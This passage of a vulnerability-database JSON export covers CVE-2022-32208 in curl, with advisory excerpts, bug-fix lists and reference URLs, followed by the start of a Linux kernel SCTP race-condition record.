CVE-2022-42915\n https://nvd.nist.gov/vuln/detail/CVE-2022-42915\n[ 25 ] CVE-2022-42916\n 
https://nvd.nist.gov/vuln/detail/CVE-2022-42916\n\nAvailability\n===========\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/202212-01\n\nConcerns?\n========\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n======\nCopyright 2022 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttps://creativecommons.org/licenses/by-sa/2.5\n. Bugs fixed (https://bugzilla.redhat.com/):\n\n2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read\n\n5. See the following\nRelease Notes documentation, which will be updated shortly for this\nrelease, for additional details about this release:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.5/html/release_notes/\n\nSecurity fixes:\n\n* moment: inefficient parsing algorithim resulting in DoS (CVE-2022-31129)\n* vm2: Sandbox Escape in vm2 (CVE-2022-36067)\n\nBug fixes:\n\n* Submariner Globalnet e2e tests failed on MTU between On-Prem to Public\nclusters (BZ# 2074547)\n\n* OCP 4.11 - Install fails because of: pods\n\"management-ingress-63029-5cf6789dd6-\" is forbidden: unable to validate\nagainst any security context constrain (BZ# 2082254)\n\n* subctl gather fails to gather libreswan data if CableDriver field is\nmissing/empty in Submariner Spec (BZ# 2083659)\n\n* Yaml editor for creating vSphere cluster moves to next line after typing\n(BZ# 2086883)\n\n* Submariner addon status doesn\u0027t track all deployment failures (BZ#\n2090311)\n\n* Unable to deploy Hypershift operator on MCE hub using 
ManagedClusterAddOn\nwithout including s3 secret (BZ# 2091170)\n\n* After switching to ACM 2.5 the managed clusters log \"unable to create\nClusterClaim\" errors (BZ# 2095481)\n\n* Enforce failed and report the violation after modified memory value in\nlimitrange policy (BZ# 2100036)\n\n* Creating an application fails with \"This application has no subscription\nmatch selector (spec.selector.matchExpressions)\" (BZ# 2101577)\n\n* Inconsistent cluster resource statuses between \"All Subscription\"\ntopology and individual topologies (BZ# 2102273)\n\n* managed cluster is in \"unknown\" state for 120 mins after OADP restore\n\n* RHACM 2.5.2 images (BZ# 2104553)\n\n* Subscription UI does not allow binding to label with empty value (BZ#\n2104961)\n\n* Upgrade to 2.5.1 from 2.5.0 fails due to missing Subscription CRD (BZ#\n2106069)\n\n* Region information is not available for Azure cloud in managedcluster CR\n(BZ# 2107134)\n\n* cluster uninstall log points to incorrect container name (BZ# 2107359)\n\n* ACM shows wrong path for Argo CD applicationset git generator (BZ#\n2107885)\n\n* Single node checkbox not visible for 4.11 images (BZ# 2109134)\n\n* Unable to deploy hypershift cluster when enabling\nvalidate-cluster-security (BZ# 2109544)\n\n* Deletion of Application (including app related resources) from the\nconsole fails to delete PlacementRule for the application (BZ# 20110026)\n\n* After the creation by a policy of job or deployment (in case the object\nis missing)ACM is trying to add new containers instead of updating (BZ#\n2117728)\n\n* pods in CrashLoopBackoff on 3.11 managed cluster (BZ# 2122292)\n\n* ArgoCD and AppSet Applications do not deploy to local-cluster (BZ#\n2124707)\n\n3. 
Bugs fixed (https://bugzilla.redhat.com/):\n\n2074547 - Submariner Globalnet e2e tests failed on MTU between On-Prem to Public clusters\n2082254 - OCP 4.11 - Install fails because of: pods \"management-ingress-63029-5cf6789dd6-\" is forbidden: unable to validate against any security context constraint\n2083659 - subctl gather fails to gather libreswan data if CableDriver field is missing/empty in Submariner Spec\n2086883 - Yaml editor for creating vSphere cluster moves to next line after typing\n2090311 - Submariner addon status doesn\u0027t track all deployment failures\n2091170 - Unable to deploy Hypershift operator on MCE hub using ManagedClusterAddOn without including s3 secret\n2095481 - After switching to ACM 2.5 the managed clusters log \"unable to create ClusterClaim\" errors\n2100036 - Enforce failed and report the violation after modified memory value in limitrange policy\n2101577 - Creating an application fails with \"This application has no subscription match selector (spec.selector.matchExpressions)\"\n2102273 - Inconsistent cluster resource statuses between \"All Subscription\" topology and individual topologies\n2103653 - managed cluster is in \"unknown\" state for 120 mins after OADP restore\n2104553 - RHACM 2.5.2 images\n2104961 - Subscription UI does not allow binding to label with empty value\n2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS\n2106069 - Upgrade to 2.5.1 from 2.5.0 fails due to missing Subscription CRD\n2107134 - Region information is not available for Azure cloud in managedcluster CR\n2107359 - cluster uninstall log points to incorrect container name\n2107885 - ACM shows wrong path for Argo CD applicationset git generator\n2109134 - Single node checkbox not visible for 4.11 images\n2110026 - Deletion of Application (including app related resources) from the console fails to delete PlacementRule for the application\n2117728 - After the creation by a policy of job or deployment (in case the object is 
missing)ACM is trying to add new containers instead of updating\n2122292 - pods in CrashLoopBackoff on 3.11 managed cluster\n2124707 - ArgoCD and AppSet Applications do not deploy to local-cluster\n2124794 - CVE-2022-36067 vm2: Sandbox Escape in vm2\n\n5",
"sources": [
{
"db": "NVD",
"id": "CVE-2022-32208"
},
{
"db": "VULHUB",
"id": "VHN-424135"
},
{
"db": "VULMON",
"id": "CVE-2022-32208"
},
{
"db": "PACKETSTORM",
"id": "168158"
},
{
"db": "PACKETSTORM",
"id": "168213"
},
{
"db": "PACKETSTORM",
"id": "170741"
},
{
"db": "PACKETSTORM",
"id": "170303"
},
{
"db": "PACKETSTORM",
"id": "168289"
},
{
"db": "PACKETSTORM",
"id": "168503"
},
{
"db": "PACKETSTORM",
"id": "168378"
}
],
"trust": 1.71
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2022-32208",
"trust": 1.9
},
{
"db": "HACKERONE",
"id": "1590071",
"trust": 1.1
},
{
"db": "PACKETSTORM",
"id": "168289",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "168503",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "168378",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "168158",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "168284",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "168275",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167661",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "168174",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167607",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "168347",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "168301",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-424135",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2022-32208",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "168213",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170741",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170303",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-424135"
},
{
"db": "VULMON",
"id": "CVE-2022-32208"
},
{
"db": "PACKETSTORM",
"id": "168158"
},
{
"db": "PACKETSTORM",
"id": "168213"
},
{
"db": "PACKETSTORM",
"id": "170741"
},
{
"db": "PACKETSTORM",
"id": "170303"
},
{
"db": "PACKETSTORM",
"id": "168289"
},
{
"db": "PACKETSTORM",
"id": "168503"
},
{
"db": "PACKETSTORM",
"id": "168378"
},
{
"db": "NVD",
"id": "CVE-2022-32208"
}
]
},
"id": "VAR-202206-1961",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-424135"
}
],
"trust": 0.01
},
"last_update_date": "2026-04-10T23:24:46.149000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Ubuntu Security Notice: USN-5499-1: curl vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-5499-1"
},
{
"title": "Ubuntu Security Notice: USN-5495-1: curl vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-5495-1"
},
{
"title": "Red Hat: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2022-32208"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-32208"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-787",
"trust": 1.1
},
{
"problemtype": "CWE-840",
"trust": 1.0
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-424135"
},
{
"db": "NVD",
"id": "CVE-2022-32208"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.2,
"url": "https://security.gentoo.org/glsa/202212-01"
},
{
"trust": 1.1,
"url": "https://security.netapp.com/advisory/ntap-20220915-0003/"
},
{
"trust": 1.1,
"url": "https://support.apple.com/kb/ht213488"
},
{
"trust": 1.1,
"url": "https://www.debian.org/security/2022/dsa-5197"
},
{
"trust": 1.1,
"url": "http://seclists.org/fulldisclosure/2022/oct/28"
},
{
"trust": 1.1,
"url": "http://seclists.org/fulldisclosure/2022/oct/41"
},
{
"trust": 1.1,
"url": "https://hackerone.com/reports/1590071"
},
{
"trust": 1.1,
"url": "https://lists.debian.org/debian-lts-announce/2022/08/msg00017.html"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/bev6br4mti3cewk2yu2hqzuw5fas3fey/"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/cve/cve-2022-32208"
},
{
"trust": 0.6,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2022-32206"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.6,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32206"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32208"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-2097"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1292"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-1292"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-1586"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-2068"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1586"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-1785"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-1897"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-1927"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-29154"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2068"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1897"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1927"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2097"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1785"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-2526"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-30631"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-29154"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-21123"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-32250"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-21166"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-21125"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1012"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1012"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-31129"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-20107"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0391"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0391"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-34903"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2015-20107"
},
{
"trust": 0.2,
"url": "https://docs.openshift.com/container-platform/4.9/logging/cluster-logging-release-notes.html"
},
{
"trust": 0.2,
"url": "https://docs.openshift.com/container-platform/4.9/logging/cluster-logging-upgrading.html"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2526"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-30631"
},
{
"trust": 0.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/bev6br4mti3cewk2yu2hqzuw5fas3fey/"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5499-1"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5495-1"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:6159"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-26116"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-26116"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25314"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27782"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1729"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27776"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html-single/install/index#installing"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22576"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1966"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3177"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-26137"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-40528"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1729"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1966"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25313"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-26137"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27774"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-40528"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3177"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:6271"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-29824"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:0408"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30632"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30698"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30629"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1304"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26716"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27406"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30293"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23772"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35525"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28131"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-38561"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-40674"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-38561"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22624"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22662"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-44716"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-0308"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35527"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-29526"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0934"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-0256"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30633"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-3709"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1705"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-3709"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-42898"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22629"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26717"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23773"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35525"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30630"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-24795"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26719"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1962"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30635"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2509"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3787"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-44716"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26709"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-0256"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-44717"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26700"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27405"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25308"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26710"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1304"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25309"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27404"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30699"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35527"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25310"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-32148"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23806"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1798"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22628"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0934"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-0308"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-37434"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-44717"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3515"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22922"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27782"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27776"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27779"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-30115"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22576"
},
{
"trust": 0.1,
"url": "https://security.gentoo.org/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-35260"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22925"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22926"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27781"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22945"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32207"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27774"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27775"
},
{
"trust": 0.1,
"url": "https://bugs.gentoo.org."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32205"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27780"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-35252"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42916"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42915"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22923"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32221"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22946"
},
{
"trust": 0.1,
"url": "https://creativecommons.org/licenses/by-sa/2.5"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22947"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:6182"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21166"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-34903"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21123"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:6560"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21125"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.5/html-single/install/index#installing"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:6507"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#critical"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-31129"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-36067"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32250"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.5/html/release_notes/"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-424135"
},
{
"db": "VULMON",
"id": "CVE-2022-32208"
},
{
"db": "PACKETSTORM",
"id": "168158"
},
{
"db": "PACKETSTORM",
"id": "168213"
},
{
"db": "PACKETSTORM",
"id": "170741"
},
{
"db": "PACKETSTORM",
"id": "170303"
},
{
"db": "PACKETSTORM",
"id": "168289"
},
{
"db": "PACKETSTORM",
"id": "168503"
},
{
"db": "PACKETSTORM",
"id": "168378"
},
{
"db": "NVD",
"id": "CVE-2022-32208"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-424135",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2022-32208",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "168158",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "168213",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170741",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170303",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "168289",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "168503",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "168378",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2022-32208",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2022-07-07T00:00:00",
"db": "VULHUB",
"id": "VHN-424135",
"ident": null
},
{
"date": "2022-08-25T15:25:12",
"db": "PACKETSTORM",
"id": "168158",
"ident": null
},
{
"date": "2022-09-01T16:30:25",
"db": "PACKETSTORM",
"id": "168213",
"ident": null
},
{
"date": "2023-01-26T15:29:09",
"db": "PACKETSTORM",
"id": "170741",
"ident": null
},
{
"date": "2022-12-19T13:48:31",
"db": "PACKETSTORM",
"id": "170303",
"ident": null
},
{
"date": "2022-09-07T17:09:04",
"db": "PACKETSTORM",
"id": "168289",
"ident": null
},
{
"date": "2022-09-26T15:37:32",
"db": "PACKETSTORM",
"id": "168503",
"ident": null
},
{
"date": "2022-09-14T15:08:07",
"db": "PACKETSTORM",
"id": "168378",
"ident": null
},
{
"date": "2022-07-07T13:15:08.467000",
"db": "NVD",
"id": "CVE-2022-32208",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2023-01-05T00:00:00",
"db": "VULHUB",
"id": "VHN-424135",
"ident": null
},
{
"date": "2025-05-05T17:18:13.390000",
"db": "NVD",
"id": "CVE-2022-32208",
"ident": null
}
]
},
"title": {
"_id": null,
"data": "Red Hat Security Advisory 2022-6159-01",
"sources": [
{
"db": "PACKETSTORM",
"id": "168158"
}
],
"trust": 0.1
},
"type": {
"_id": null,
"data": "arbitrary, code execution",
"sources": [
{
"db": "PACKETSTORM",
"id": "170303"
}
],
"trust": 0.1
}
}
VAR-202104-1571
Vulnerability from variot - Updated: 2026-04-10 23:03
A race condition in Linux kernel SCTP sockets (net/sctp/socket.c) before 5.12-rc8 can lead to kernel privilege escalation from the context of a network service or an unprivileged process. If sctp_destroy_sock is called without sock_net(sk)->sctp.addr_wq_lock then an element is removed from the auto_asconf_splist list without any proper locking. This can be exploited by an attacker with network service privileges to escalate to root or from the context of an unprivileged user directly if a BPF_CGROUP_INET_SOCK_CREATE is attached which denies creation of some SCTP socket. 8) - x86_64
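The unlocked list removal described above is a classic shared-state race: one path mutates auto_asconf_splist under addr_wq_lock while the destroy path mutates it with no lock at all. As a user-space analogy only (Python threads, hypothetical names — this is not kernel code and not the actual patch), the fixed pattern of taking the same lock on both the add and the remove path looks like this:

```python
import threading

# Illustrative analogy: a shared list (standing in for auto_asconf_splist)
# must be mutated only while holding its lock (standing in for
# sock_net(sk)->sctp.addr_wq_lock). The upstream fix makes the destroy
# path take that lock before the list removal.
splist = []
splist_lock = threading.Lock()

def create_socket(ident):
    with splist_lock:          # add under the lock
        splist.append(ident)

def destroy_socket(ident):
    with splist_lock:          # the fix: remove under the same lock
        if ident in splist:
            splist.remove(ident)

def lifecycle(ident):
    create_socket(ident)
    destroy_socket(ident)

threads = [threading.Thread(target=lifecycle, args=(i,)) for i in range(100)]
for t in threads:
    t.start()
for t in threads:
    t.join()

# Every thread removed exactly the entry it added, so the list ends empty
# and is never mutated concurrently without the lock held.
print(len(splist))
```

Each thread adds and then removes its own unique entry, so after all joins the list is deterministically empty; the point is only the pattern (same lock around every mutation of the shared list), not a reproduction of the kernel race.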
- Description:
The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.
Security Fix(es): * kernel: out-of-bounds reads in pinctrl subsystem. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
